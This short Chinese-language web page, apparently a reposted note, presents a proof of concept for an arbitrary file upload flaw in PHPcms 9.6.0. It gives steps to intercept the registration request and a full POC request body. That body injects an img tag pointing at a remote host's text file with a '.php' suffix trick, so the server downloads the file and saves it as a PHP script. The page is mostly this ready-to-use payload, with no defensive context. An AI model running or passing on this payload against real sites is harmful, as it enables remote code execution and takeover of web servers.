您的位置:首页 > 编程语言 > PHP开发

最新PHPcms9.6.0 任意文件上传漏洞

2017-04-10 19:22 627 查看
在用户注册处抓包:



然后发送到repeater



POC:

siteid=1&modelid=11&username=z1aaaac121&password=aasaewee311as&email=a1ea2144@qq.com&info[content]=<img src=http://www.tzjrst.com/templets/1.txt?.php#.jpg>&dosubmit=1&protocol=
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: